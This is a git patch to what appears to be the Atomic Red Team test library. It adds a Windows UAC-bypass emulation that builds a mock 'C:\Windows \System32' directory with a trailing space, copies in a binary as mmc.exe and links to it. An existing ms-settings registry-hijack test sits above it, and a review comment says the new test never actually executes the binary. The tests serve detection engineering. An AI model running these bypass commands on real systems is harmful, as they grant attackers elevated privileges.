From bb945c8d61d780926cf152cdcb72205fd2976ae4 Mon Sep 17 00:00:00 2001
From: dwhite9
Date: Mon, 2 Dec 2019 10:39:07 -0600
Subject: [PATCH] T1088 mocking trusted directories - New Atomic (#704)

* Created rough draft for new atomic: T1088 - UAC Bypass via Mocking Trusted Directories.
* Fixed typo in Mocked directory. Tested cleanup commands successfully.
* Fixed path of cleanup command to match change in directory of primary command.
---
 atomics/T1088/T1088.yaml | 26 +++++++++++++++++++++++++-
 1 file changed, 25 insertions(+), 1 deletion(-)

diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml
index bb70db03..da18b9f2 100644
--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -115,4 +115,28 @@ atomic_tests:
 Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
 Start-Process "C:\Windows\System32\ComputerDefaults.exe"
 cleanup_command: |
- Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
\ No newline at end of file
+ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
+
+- name: Bypass UAC by Mocking Trusted Directories
+ description: |
+ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ executable_binary:
+ description: Binary to execute with UAC Bypass
+ type: path
+ default: C:\Windows\System32\cmd.exe
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ mkdir "\\?\C:\Windows \System32\"
+ copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
+ mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
+ cleanup_command: |
+ rd "\\?\C:\Windows \" /S /Q
+ del "c:\testbypass.exe"
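Review bot: The new `executable_binary` argument is documented as "Binary to execute with UAC Bypass", but the added `command` block only runs `mkdir`, `copy` and `mklink` and never launches anything, so the argument is copied, not executed, and the test as written stages artifacts rather than demonstrating a bypass. The argument description should say what actually happens, e.g. `description: Binary to copy into the mocked "C:\Windows \System32\" directory as mmc.exe`, and the test `description` should state plainly that this atomic creates the trailing-space mock directory, the copied mmc.exe and the c:\testbypass.exe link, which is also the activity a detection for this technique should key on. Separately, `mkdir` and `mklink` will fail if a previous run was not cleaned up, so a reviewer may want the description to note that the `cleanup_command` must have run first; that is presumably tolerable for an atomic, but it is not documented.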